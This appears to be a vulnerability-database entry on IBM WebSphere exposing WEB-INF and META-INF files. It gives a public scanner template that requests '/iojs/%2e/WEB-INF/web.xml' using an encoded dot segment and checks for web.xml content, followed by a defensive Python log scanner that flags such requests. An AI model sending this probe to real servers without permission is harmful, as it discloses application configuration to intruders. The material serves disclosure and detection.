ibm-websphere-xml: IBM WebSphere Application - Source File Exposure

Date: 2025-08-01 | Affected software: IBM WebSphere Application | PoC: public

Vulnerability description

Discloses application-specific files contained within the WAR file, including files under the WEB-INF and META-INF directories.

PoC code [public]

id: ibm-websphere-xml

info:
  name: IBM WebSphere Application - Source File Exposure
  author: r3nz0
  severity: medium
  description: |
    Disclose application specific files contained within the war file, including files under the web-inf and meta-inf directories.
  reference:
    - https://www.acunetix.com/vulnerabilities/web/ibm-websphere-weblogic-application-source-file-exposure/
  metadata:
    verified: true
    max-request: 1
  tags: ibm,websphere,exposure,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/iojs/%2e/WEB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</web-app>"
          - "<servlet>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022074a39d8f43438bc7d1d094d5b7654c6f06a4017d44b031c3017680bd8f56e0a2022100b705d4bc131f0765d38f2593e8116e249789b83919deac09f6b9d109527c3cb1:922c64590222798bb761d5b6d8e72950
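
Added example (not part of the template or the original page): a Python check that reviews web server access logs for the request shape the template sends, flagging any request whose decoded path reaches WEB-INF or META-INF and marking those answered with 200. The combined log format, the function names and the sample entries are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Request line and status from a common/combined-format access log entry.
LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PROTECTED = {"web-inf", "meta-inf"}  # directories a servlet container must never serve

def fully_unquote(text, rounds=3):
    """Percent-decode repeatedly so double encoding (%252e) is unwrapped too."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify(line):
    """Return None for unrelated lines, else details of a protected-directory request."""
    m = LOG_RE.search(line)
    if not m:
        return None
    raw = m["target"].split("?", 1)[0]
    decoded = fully_unquote(raw).replace("\\", "/")
    segments = [s.lower() for s in posixpath.normpath(decoded).split("/") if s]
    if not PROTECTED.intersection(segments):
        return None
    return {
        "path": raw,
        # A "." or ".." segment that only appears after decoding suggests filter evasion.
        "encoded_dot": any("%" in s and fully_unquote(s) in (".", "..") for s in raw.split("/")),
        # 200 means the container returned content: treat as a confirmed exposure.
        "served": m["status"] == "200",
    }

def scan(lines):
    """Classify every log line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample entries (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "GET /iojs/%2e/WEB-INF/web.xml HTTP/1.1" 200 1843',
    '203.0.113.7 - - [01/Aug/2025:10:00:02 +0000] "GET /iojs/%252e/META-INF/MANIFEST.MF HTTP/1.1" 404 210',
    '198.51.100.4 - - [01/Aug/2025:10:00:03 +0000] "GET /iojs/index.jsp HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Aug/2025:10:00:04 +0000] "GET /app/WEB-INF/web.xml HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Entries with "served" set to True warrant checking what the returned file revealed; the others show probing that the server refused.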